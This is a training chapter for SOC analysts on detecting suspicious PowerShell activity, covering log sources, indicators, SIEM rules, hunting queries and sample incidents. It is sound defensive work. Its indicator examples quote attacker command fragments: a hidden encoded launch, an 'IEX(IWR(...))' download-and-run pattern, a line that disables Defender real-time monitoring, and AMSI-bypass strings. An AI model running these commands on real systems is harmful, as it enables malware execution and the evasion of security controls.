Suspicious PowerShell activity is one of the most important SOC use cases because attackers frequently use PowerShell for initial access, payload execution, lateral movement, credential theft, and fileless malware delivery.
This chapter explains every pattern analysts must detect, every log source to monitor, and practical SIEM detection logic used in real SOC environments.
PowerShell is extremely powerful, deeply integrated into Windows, and easily abused.
Most malware infections and post-exploitation stages produce clear traces in PowerShell logs, Sysmon telemetry, and EDR behavior.
A SOC analyst must be able to detect normal usage vs malicious usage instantly.
Why Attackers Use PowerShell
PowerShell is abused because it:
-
Runs natively on Windows
-
Supports execution of remote scripts
-
Can run fully in-memory (fileless)
-
Can download files via
Invoke-WebRequest -
Can execute Base64-encoded payloads
-
Can bypass logging if misconfigured
-
Can load .NET assemblies dynamically
-
Can access credentials, registry, processes, WMI
Attackers use PowerShell for:
-
Malware download & execution
-
Payload staging
-
Lateral movement
-
C2 beacons
-
Data exfiltration
-
Reconnaissance
-
Persistence creation
Suspicious PowerShell detection is mandatory in every SIEM and EDR.
Log Sources Required for Detection
SOC detection relies on multiple logs.
Windows PowerShell Logs
Located under:
Microsoft-Windows-PowerShell/Operational
Includes:
-
Script execution
-
Module loading
-
Pipeline commands
-
Event ID 4104 (script block logging)
Windows Event Logs (Security)
-
Event ID 4688 (process creation)
Shows PowerShell execution and command-line arguments.
Sysmon Logs
-
Event ID 1 (process creation)
-
Event ID 3 (network connections)
-
Event ID 11 (file creation)
EDR Telemetry
Provides:
-
Command-line visibility
-
Network activity
-
In-memory execution
These combined provide full visibility.
Indicators of Suspicious PowerShell
Encoded Commands
Attackers hide commands using Base64 encoding.
Example:
powershell.exe -enc JAB3AHM...
Suspicious because normal users rarely execute encoded PowerShell.
Hidden, Non-Interactive Execution
Flags attackers often use:
-
-nop(no profile) -
-w hidden -
-noni -
-nol
Example:
powershell.exe -nop -w hidden -enc <base64>
Download & Execute Behavior
Patterns:
Invoke-WebRequest
Invoke-Expression
Invoke-Command
(New-Object Net.WebClient).DownloadString(...)
(New-Object Net.WebClient).DownloadFile(...)
Payload download is a strong indicator.
Suspicious Parent Process
Dangerous parent → child PowerShell execution:
-
WINWORD.exe → powershell.exe
-
excel.exe → powershell.exe
-
outlook.exe → powershell.exe
-
chrome.exe → powershell.exe
This chain often indicates phishing infection.
Living-Off-The-Land Abuse (LOLbins)
Attackers use PowerShell to execute:
-
rundll32
-
regsvr32
-
mshta
-
wscript/cscript
Example:
powershell.exe → rundll32.exe maliciousfile.dll
Fileless Malware Execution
Common patterns:
-
Reflective DLL loading
-
In-memory payload
-
No dropped files
Indicators:
IEX(IWR('http://malicious/...'))
PowerShell Reconnaissance Activity
Common attacker recon commands:
Get-NetUser
Get-ADComputer
Get-Process
Get-Service
If run on non-admin systems → suspicious.
PowerShell Persistence
Attackers use PowerShell to create persistence:
Set-MpPreference -DisableRealtimeMonitoring $true
schtasks.exe /create ...
New-Item -Path HKCU:\Software\Microsoft\Windows\Run
PowerShell C2 Beaconing
Patterns include:
-
Repeated HTTP requests
-
Random sleep intervals
-
Encrypted payloads
-
Connection to strange IPs or domains
EDR or Sysmon will show outbound traffic from PowerShell.
Practical SIEM Detection Logic
Rule 1 — Encoded PowerShell Execution
Detect Base64 encoded commands:
CommandLine contains "-enc"
CommandLine matches "[A-Za-z0-9+/]{100,}"
Rule 2 — PowerShell From Office Applications
ParentImage endswith "WINWORD.exe" OR endswith "EXCEL.exe"
Image endswith "powershell.exe"
This is a high-fidelity detection.
Rule 3 — Suspicious Download Commands
CommandLine contains "Invoke-WebRequest"
OR CommandLine contains "DownloadString"
OR CommandLine contains "DownloadFile"
Rule 4 — Hidden Execution
CommandLine contains "-w hidden"
OR CommandLine contains "-WindowStyle Hidden"
Rule 5 — PowerShell Creating EXE Files
Sysmon ID 11:
TargetFilename endswith ".exe"
AND Image endswith "powershell.exe"
Attackers rarely use PowerShell to drop executables.
Rule 6 — PowerShell Network Connections
Sysmon ID 3:
Image endswith "powershell.exe"
AND DestinationIp not in internal ranges
Indicates C2 traffic.
Rule 7 — AMSI Bypass Attempts
Strings to detect:
-
FromBase64String -
AmsiUtils -
AmsiScanBuffer -
bypass
Threat Hunting Queries
Hunt for Common Malicious Patterns
powershell AND (enc OR base64 OR download OR IEX OR WebClient)
Hunt for PowerShell Spawned by Suspicious Parents
ParentImage:winword.exe AND Image:powershell.exe
Hunt for C2 Behavior
Image:powershell.exe AND DestinationPort:80 OR 443
Real SOC Examples
Example 1 — Phishing → PowerShell Loader
Logs show:
WINWORD.exe → powershell.exe -enc <payload>
powershell.exe connects to 91.22.113.10
Confirms malware loader.
Example 2 — Fileless Cobalt Strike
powershell.exe → IEX → remote script
dllhost.exe injection detected
Beacon identified via memory forensics.
Example 3 — Ransomware Stage 1 Loader
PowerShell drops:
C:\Users\Public\update.exe
Then executes it.
Example 4 — Reconnaissance Commands
User never uses AD cmdlets:
Get-NetDomain
Get-ADForest
Likely internal attacker.
Intel Dump
-
Suspicious PowerShell detection is critical because attackers heavily abuse PowerShell for execution, C2, recon, payload delivery, and persistence.
-
Key indicators include encoded commands, hidden windows, suspicious parent processes, download commands, and abnormal network traffic.
-
Logs used: PowerShell Operational logs, Windows Security logs, Sysmon Process Creation and Network logs, and EDR telemetry.
-
Detection involves rule-based patterns like
-enc,Invoke-WebRequest,FromBase64String, and office apps spawning PowerShell. -
Hunting focuses on process lineage, encoded commands, outbound traffic, and abnormal execution paths.
-
Process trees clearly expose phishing infections, fileless malware, and lateral movement executed via PowerShell.